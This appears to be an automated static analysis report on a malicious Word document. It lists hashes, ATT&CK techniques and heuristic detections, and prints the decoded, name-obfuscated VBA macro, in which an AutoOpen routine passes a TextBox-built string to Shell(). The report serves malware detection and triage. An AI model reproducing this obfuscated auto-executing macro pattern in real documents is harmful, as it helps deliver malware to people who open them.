Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 03a5b4ce64c50344…

MALICIOUS

Office (OLE)

Size: 107.9 KB
Created: 2018-12-14 03:08:00
Authoring application: Microsoft Office Word
First seen: 2020-02-04
MD5: 0fc70a4c0f63e9ddf9a09d742f3f62ae
SHA-1: 98f9d58cd6cf34617a9aaa5778a8e82e1c407628
SHA-256: 03a5b4ce64c50344302238b313893865ac21adf5f5e2030d2bd50f6fee81d7d5
Risk Score: 292

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1059.001 PowerShell
  • T1059.003 Windows Command Shell
  • T1204.002 Malicious File

The sample is a malicious Office document containing a VBA macro. The 'autoopen' macro is present and uses the Shell() function, indicating an attempt to execute arbitrary code. Heuristics also indicate references to PowerShell and cmd.exe, suggesting the macro likely downloads and executes a second-stage payload. The ClamAV detection 'Doc.Malware.Sonbokli-6786376-0' further confirms its malicious nature.

Heuristics (10)

  • ClamAV: Doc.Malware.Sonbokli-6786376-0 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Sonbokli-6786376-0
  • VBA macros detected [medium] OLE_VBA_MACROS (3 related findings)
    Document contains VBA macro code
  • Shell() call in VBA [critical] OLE_VBA_SHELL
    Shell() call in VBA
    Matched lines in script:
      Set YVFEamZMCBGLCSWZUJGinKQ = HoiBMNIsUwCEPXisCQfWNP
      otqOFNXMz = Array(brIFIS, EcHmcHS, ulsSYwIiX, Interaction.Shell(FJiHDJoBvaI, DwNpiWpA), EUddPca)
         Select Case zkbUQkjGbBDiVRYfMOI
  • VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • AutoOpen macro [low] OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched lines in script:
      Attribute VB_Control = "TextBox1, 0, 0, MSForms, TextBox"
      Sub autoopen()
      GiIvHcf
  • Suspicious cmd.exe invocation with execution flag [high] SC_STR_CMD
    Suspicious cmd.exe invocation with execution flag
  • Reference to PowerShell [high] SC_STR_POWERSHELL
    Reference to PowerShell
  • Legacy WordBasic auto-exec macro marker [medium] OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Suspicious extracted artifact [info] EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
      URL http://www.iec.ch (channel: document text, OLE body)
      URL http://schemas.openxmlformats.org/drawingml/2006/main (channel: document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 9931 bytes
SHA-256: a15e8c34622087857b9938c39724f15199ccadab7275178c6b9f6a986519dfd0
Detection: ClamAV: No threats found
Obfuscation or payload: likely
  265 of 308 identifiers look randomly generated (e.g. 'IDERijbrjplIvitQQCLbjqwH'), consistent with name-mangling obfuscation.

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "AiliVFBnpQBWf"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "TextBox1, 0, 0, MSForms, TextBox"
Sub autoopen()
GiIvHcf
End Sub

Attribute VB_Name = "jCrccuGihAQA"
Function GiIvHcf()
On Error Resume Next
   Select Case uiBizvUWjWiYSNqvNtF
      Case 211762241
         ZvlSHSObvElzChPUMvBiqXlm = fTOcpoozZUnPPpcFunRtZQfa
         AzDBHBJzVczAzFQzBdM = Log(EwFYYvkTsYPnnAoqkwR)
         dQtNdFuhBwXmTzWEsi = 189480325
         RpGzNLMwRZMFLtzo = svTBCSwAcUoikz
      Case 39275106
         FBoJwzSswQbkRbZBiB = 341471985
         JKPXKwlqYUhcGmFrJiGsc = Log(EmqMiAvnwjwWJvmRzzO)
         UbjzdfVhrDuHGiFdjwN = 238092348
         kYzikcKFsiGiBFdCqiDiNvso = Log(PbpIkBlijjDlVtCLbzYncFc)
   End Select
Set apPKFipjInUBVzHdVzUW = RVpATlvTBOJwMiumbZz
   Select Case tRMziBszBzUfDqRSVZtRtJ
      Case 327569417
         oljBGZGbAUuUQmKj = YYQYRYoNGptiUzkT
         JtSqsbqtfiwwBiPJEUkhnWMu = Log(zkNsfXKBQdQRWjwZimpsQE)
         iYPczmLnjXCsrdA = 338269233
         lvkFwsionHJjWBXv = jUQuKPEqjtTnEwiniGVU
      Case 6686848
         fhoLiCDKVfzNujjQbjfO = 94362220
         OBiKivrvBacCpjGwkBmZXopr = Log(wEOfpomRfSndUY)
         SaiWkrqzJcvdcoc = 174944361
         rIjrdQMmqlJQSVQd = Log(HwJSGKHEECtKKdCsclLr)
   End Select
Set oKRktGjjrHfzzjjQs = zZnYNSbjHHYqjEmOSlsiM
   Select Case IZZLRnBBKVJOwhQdEYCNfBU
      Case 226235697
         KJppoZolLApofcnW = rTcCAvqaTJhLMHErBGi
         LVvVcnjapYwPrEJA = Log(HKNzOVPGawskwdV)
         LOVXHZNOQkuNRTH = 326687805
         ltwQLzAjOCoopt = aGjqodwiwwiiaBoGrvhLjYs
      Case 337374978
         UrsXZaarzmLnRJanL = 1678958
         cSaiavztIhLBOhYTm = Log(KXYInaPdTZlGXYY)
         WwuMScbhSJokwGspohA = 189700483
         UfzPwbXHBKndnKaYZnivrqd = Log(ijNhwSpXvhBTvwVADaQzAH)
   End Select
Set vSROuShCiCMlQOq = jUQhGJHccRirQZim
   Select Case CYbWSLGdvrtmpNsolrw
      Case 81896631
         fkZmwIwvQSqdIui = TCZvKziFTLwUiCG
         VWXoCjUCJhfYDIjTKjRo = Log(QuiCTSmMcNOMKIlWtFj)
         XmcSJCKicJCkRHEbpmjRh = 280516889
         URLsAuwQbiGBiSPsQHHj = KdvDDKhHWSBjFHBzK
      Case 68298671
         jtbBLGaJZtSJZHOKnQpwk = 96834096
         FQEUYKOuGzXDZjb = Log(zdAIOEIbZrzOhVNzRkWlG)
         BzLwLLCDobLjrTjGuBHdv = 220835322
         ANljYlpNpdLcBzPs = Log(ZVCVCBduPLpVicqTmKlZciRz)
   End Select
Set VCjqiJfIKEZfrzMIo = azsKAUIPmiTUvDC
Const DwNpiWpA = 0
   Select Case lVwlVOfIYfPvML
      Case 312551555
         FCuRJrUZHOwzvmHj = ZzvQZPMtiHKMIHI
         uwfivtuAXiHQiMlXjnnN = Log(tjniYbkJNzHqTBqcENfDvtuI)
         LVVnjVTuiBPrwWSKqKfzZOKv = 305664991
         ZHKEAlimMFOWjinvoAa = IqNtEjPIWwLatFvMjZAdN
      Case 67441472
         MvUdBMiaKUJTitRA = 111466308
         WQPuodbibLOzzXzjAz = Log(FOwrWAGjmMSSZjHquuSHq)
         SkSLLWlVCsTQLH = 170518531
         tuhtpVItpPqhDliqtCw = Log(ZLojwRKZwJYzQWBY)
   End Select
Set wNwcZWvjERQKdXILOwh = wvYLjufrqQhkKQw
   Select Case rptbBCRRihSiai
      Case 60944573
         XnkDstXtTwXfwqddki = iznlLKQHoOjXnUirqAoKzS
         IFflVoEozrqiXj = Log(YscmifkYjLRzmc)
         XrMzfjfZuSkZlfzpHHobwiLk = 138290136
         jvaDpRMBUzSXDWsThTz = wtmVKrwAzpfciHA
      Case 238460256
         qdSNjLzXjERjcArmPZnJEtzT = 76948995
         iTqtwVIUqqfsPh = Log(wbnjRWoopPhNbuzfzBhjih)
         IwaIJBGXKFUGRKmufqfAdO = 56865580
         ZtKfqiBKQkfkrNfmjsXHG = Log(fVMHBqzhMtnsjQrajcEJpj)
   End Select
Set CCSKsRlqAalNoTjhKLjY = zwiPvILvDwwwqKEifGPaD
   Select Case vzNqVzoNGQNPHLvbXZbGjz
      Case 113748171
         ZFwdmZZPHYfUwpbtYh = IDERijbrjplIvitQQCLbjqwH
         fbchzhizDJQUnOwKipZWQ = Log(lEYLqMFPREwjCEwJlICIs)
         dwdoOQzAZlSvpYJmqVu = 263425614
         MYDLsLZEQTIrMbchCwoRRiK = HOazzRhOEiRXZdVEY
      Case 317662200
         RJDdzhFoXFWZhNm = 25750100
         lZEwmuniJEHZcktVVtHD = Log(dStdKIiIjKmZsTwrKiPQw)
         cwOuVcDMUfArIGLVclFVau = 135286722
         kQuiKOrnnppvPP = Log(FEXpHYAKrfpCiKdNidOKEi)
   End Select
Set BFnMESRPFNzzQCENbjG = wVLNcKcHSBFjXf
   Select Case ujKHAHpoLmDwRwOtmKKuYHiC
      Case 52461296
         unfuZBCfDvuMzaVr = ZqBwDuEFflLbnAHzoN
         IQNCwmtTzZMkYj = Log(JMGOqsaotPrEPunNINUjEM)
         FKKaFjSBmuBrutaWIibTmE = 226726014
         ZMMEWEzhzYAEfSUIbNEJ = CsUirLAcsBAbhBtTO
      Case 205701779
         zUuVsVqqNTsYAYOXTsVis = 322251076
         EXzcwQboMiWMtH = Log(bNBVmJzcACTdZbsApA)
         pwtssZmifqiMUPzRI = 195846377
         KuFuzaimBNUijMdSXh = Log(IvAiTmVqwOcJkWSqVk)
   End Select
Set uSNmlQLHwArzZj = UbJQlHdjjYYEkLOWHhTnCv
   Select Case YlDWTLoHGrjnlMoihiaR
      Case 71876279
         tBvtSiDHYAchwEwMDK = GpKRtzbXoTODsRCrBbZt
         EwSiKEOjjViPnDh = Log(jBwrKOnKwkQwMwldRYCqr)
         jtMnEwjnFNUJSZdCvpLIm = 173795293
         SWnkAwOBqqARDiWKpaIiCb = iLAPdMijwJFuRR
      Case 92173373
         prMiSSHaXYfWidwlrTIYA = 228422692
         oMHDIzjFsbrTmqzkMDZrE = Log(IATMTDwIpiGGXRLOwcnSm)
         rKJutiwVaqjGDHkvijHjmIM = 216434472
         fZzEzDluNJIDYJPMT = Log(PZQODdCwHLDIizc)
   End Select
Set OIwQdnvMpzbsFWrXSAw = BQVUBwwarFbLbwu
FJiHDJoBvaI = AiliVFBnpQBWf.TextBox1 + iciEZ + KtlTf + SrFKGM + PVTdz + UUkWQQIb + BUawmiO + JGWwUjoA + GXLXZjN + iUbLi + jpjlu + cHJmiQ
   Select Case GjuaofTcPWMGpQjUlpIpkd
      Case 185276828
         dYAidFWwcuAUNX = XtMCptkWviKLqj
         EcEuzQfozJAQivPO = Log(NolwYbmHsBFATtf)
         QqYPTaksFMtpcFbjP = 20969943
         CvPfBSmEOZnfPVAOErwnnEsq = hwinZZlQvcUALWzj
      Case 141964255
         SSjiUcrXpQQLwCZTTV = 54732018
         pABPTsfOtUBGRiaXi = Log(cBwCjVAkiSarCb)
         EjRRRKczcdUPJtPbCoQ = 298824932
         VmQjPiNNoBSZhNC = Log(FNtAETYPGqrPqXD)
   End Select
Set iRitAlBbOkocCpcfMSwaWt = BOBaZrwWQwfrPi
   Select Case soTDKucXliYCMWWFznsaril
      Case 39353978
         pVaFKmNwpFpzppuYzdWScOi = kTtAECODNLUYBSa
         LEXQjFHzwCrAPnPbnSUrtMtm = Log(mmiVVXhCaHYqScfLvCCKOoZ)
         tljzjCwKkZtTdccfKzofrkUq = 272859816
         zKrbcwMibknjTYJNFsiL = SaWAQzuEIRsICEoTJzvGu
      Case 6284503
         radQWdfcIdzfjUbLwSiTTub = 111568322
         UuwvmFnRifZniXadok = Log(FYEwhlwoQhZwzMwBiijV)
         KNBpBYQuDqiJzLuQwOK = 273058841
         WkJiaalWruIPGvKDI = Log(MjtNqumCBClmTWjHndsH)
   End Select
Set wiYLvWuqQkMnizIWJtO = YZjkFbliwIhKBEOBVBuYrLkR
   Select Case liQqczZjMqJlPNriiJuElFi
      Case 48292880
         fzoPaROVmcwHoSY = QpDjtwDJHGqBWHfAI
         wCkTmZvPdkuatrVmVPaXP = Log(tiHTbMziwwwGVWhzDiodU)
         PhMwfkmQZkSOJFLSzi = 107815517
         nwbnVzEXMwjlMaPaGchOsjWN = GMbmkjGNWfRFZdfjODdBjC
      Case 229833539
         kMVBBFHbOwOmclcPcYqvwV = 218895407
         BiictMIEdlBXKFLQYpraOsDd = Log(NYHLnsOiWzSbiiBqKJr)
         EEXMaXIiGkIfABfnAtqtn = 296723620
         FtotHpkEjMuWIAvlQjkYmr = Log(bcCOqQTwwLQSTldBpWfYTG)
   End Select
Set XmEHZJCUBNGNQEaunQNz = ricAnhuCGSUUwfcl
   Select Case jwzpVQCAzdJKkhXG
      Case 46771868
         rSBKwNzOJijKNLAQD = OiIFvMDaARdXjcPAw
         JVwlpGGTTmPwJUdEsYImWpG = Log(NhlmwEvNPJGhUctCwct)
         KBIJtfjrrJUUPZXIV = 135102298
         OqCjzNwkPfGnuvoNMZ = sTUEVFolSuFkjiGiaHS
      Case 60937234
         zvULkWaYaMLjucCtmhdKcdpK = 305824814
         JnROGtPjuYAskiOMrit = Log(lCEkoaowTUFKRK)
         mHMFRTOhdttwvvPl = 48367220
         soHijZfFQMaSqbaVb = Log(fcciXUaruitCEiz)
   End Select
Set YVFEamZMCBGLCSWZUJGinKQ = HoiBMNIsUwCEPXisCQfWNP
otqOFNXMz = Array(brIFIS, EcHmcHS, ulsSYwIiX, Interaction.Shell(FJiHDJoBvaI, DwNpiWpA), EUddPca)
   Select Case zkbUQkjGbBDiVRYfMOI
      Case 213553833
         MjWLVLlZwwPbYOoBAoZiIRa = jZDvqjUCOjnDFIuZzhdEoGwC
         dLaizkvGXfvIqjObMNrbl = Log(rtAkaoVKadAMMYtUQwrzhdwQ)
         wOcctFbwhThiNJG = 238962951
         ESIiWqhswvjnOOuj = cathjXYNfEMlDmlMUYjI
      Case 194425028
         XvkzJsKSFnzkhjrjYuj = 110884928
         mVGsJwaupOazBCzzjOjCMzY = Log(SEEVoAlZMklZiEAtkYPZYl)
         itiojCOimwTaEtFGodAm = 111869160
         YTfNmSojzNhYZcFME = Log(wFwcKdwAfSbwYwPNUP)
   End Select
Set TPwqDzGsfTcAcYd = LSwIBQmnWIDpiJMHpDkHCP
   Select Case FRjiwhfsuzlmbuYhGYj
      Case 165473779
         HYHBqDWYPlNWlQqlcdG = tBXfSoEiCwlwVAwtchFiIUf
         YPqiiwivdiiFAbjCw = Log(VRzQBkRzJuYbhYWJHCwazG)
         qTmVssAwDfVwOOHOFM = 243232673
         jXBAFjrTjDYoPzJzOPZFIw = vMaHuAosNOTkSRmPIA
      Case 215693894
         zHjjREKzqnfimCFnf = 184445548
         TsLLZvMqfczQEbfVofqqqppC = Log(iowQLwjjDMZowHoENiW)
         XbDHjRIplHdDIlqHNaTiPjA = 96688268
         hrYClcLSMCHlqkt = Log(uvwiWfKRhrnKranaoBwajn)
   End Select
Set iSkwjjVXpZoVoEfjCjHUuoAa = PjwomTGGvRQlibiLTwlDF
   Select Case vfUpGjtUcoEJdzDmfDrlL
      Case 79390792
         FbBKSVvztWpvjCqKauBO = ZiNcuosEnBZjzPOEYbwjqK
         oDTkotRqKzsjzohYjDsFVP = Log(kmbFCTCivOrYZaED)
         WKPlGjRPqDSdwFQZ = 282489848
         zNnPXHPzRFQIzczhiKzad = KpLQkEzIaziqHq
      Case 154770044
         nIWJRMziFpdRXGZ = 106030876
         uCwDGWKAJiQZGVI = Log(bXqETmwpcKuajlUZ)
         kNoZDjlLJHhiIwUVH = 316186135
         iLmHEIawbjTYJrHVIUkXq = Log(sKiQHULaFZpmqGw)
   End Select
Set jRdkKcpjXrBdMBW = rdTbdnBGkBiuiXAAWDk
   Select Case TwJSozjKPHBZhHhw
      Case 324122818
         XvUJjnaDwHBqTlUUlBsIYhfh = kfKpZFYcDEVrJPWs
         zYJZoPFNWfGpXpPnzwIPN = Log(CcNPhzcblVPniHXnwPE)
         CZRnjPFDMTOdWaVjLZi = 40075943
         vtlZjHIPKzsKmWdLaiRtY = SHmQHlrbWhwqHfjOw
      Case 53767800
         nCTVSkEsVlqQMMjbdnSzXYid = 71002413
         vPwiMlJwkNwlTjDt = Log(qfQmdaDCadJZPTqLGo)
         tqYFGPcTdsTmviCrztZSou = 184323825
         HAWVtIaNrPzfRaJWBHaKH = Log(NvMcsRjWAzOnzGtHZURFvff)
   End Select
Set ZXjDRjTRiQmaIRPJjU = zRicDduiFsBvhQpCV
End Function